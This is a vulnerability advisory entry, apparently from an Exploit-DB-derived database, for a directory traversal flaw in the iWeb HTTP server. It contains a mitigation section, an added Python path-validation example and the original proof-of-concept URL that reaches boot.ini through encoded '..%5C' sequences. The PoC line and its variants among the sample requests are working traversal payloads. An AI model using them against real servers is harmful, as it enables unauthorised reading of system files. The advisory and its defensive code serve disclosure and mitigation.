Vendor: iWeb
By: mr_me
CVSS: 7.5 (HIGH)
Vulnerability: Directory Traversal
CWE: 22
Product Name: iWeb
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:ashley_brown:iweb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

iWeb HTTP server Directory Traversal Vulnerability

This vulnerability allows an attacker to access files outside of the web root directory by placing directory traversal sequences in the requested path. An attacker can use it to access sensitive files such as boot.ini, which can be used to gain further access to the system.

Mitigation:

Ensure that web applications are not vulnerable to directory traversal attacks by validating user input and restricting access to sensitive files.
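
One way to implement the input validation recommended above, as an added example (not code from iWeb or from the original advisory). The path is checked after percent-decoding and with `\` treated as a separator, so the `..%5C` form used in this entry's PoC is rejected as well as `../`. `WEB_ROOT`, the function name and the sample requests are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/iweb/htdocs"  # hypothetical web root, not taken from the advisory


def resolve_request_path(raw_path, web_root=WEB_ROOT):
    """Map a raw request path to a location under web_root, or return None."""
    # Drop the query string, then percent-decode once: checks must run on the
    # decoded form, otherwise "%5C" and "%2e%2e" pass a naive "../" filter.
    decoded = unquote(raw_path.split("?", 1)[0])
    if "\x00" in decoded or ":" in decoded:
        return None  # NUL bytes, drive letters (C:), NTFS stream syntax
    segments = []
    # Windows accepts both separators, so normalise "\" to "/" before splitting.
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue  # empty or current-directory segment, harmless
        if set(seg) == {"."}:
            return None  # "..", "..." and similar dot-only segments
        segments.append(seg)
    candidate = posixpath.normpath(posixpath.join(web_root, *segments))
    # Defence in depth: the normalised result must still sit under the web root.
    if posixpath.commonpath([web_root, candidate]) != web_root:
        return None
    return candidate


# Constructed sample requests; the first is the PoC path from this entry.
SAMPLE_REQUESTS = [
    "/..%5C..%5C..%5Cboot.ini",
    "/../../boot.ini",
    "/%2e%2e/boot.ini",
    "/C:%5Cboot.ini",
    "/docs%5Cindex.html",
    "/images/logo.png?v=2",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req!r:32} -> {resolve_request_path(req)}")
```

A server that opens files on disk should additionally resolve symbolic links and junctions (for example with `os.path.realpath`) and repeat the containment check on the resolved path.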

Exploit-DB raw data:

#################################################################
#
# iWeb HTTP server Directory Transversal Vulnerability
# Found By: mr_me
# Download: http://www.ashleybrown.co.uk/iweb/
# Tested On: Windows XPSP3
#
#################################################################

POC:

http://server/..%5C..%5C..%5Cboot.ini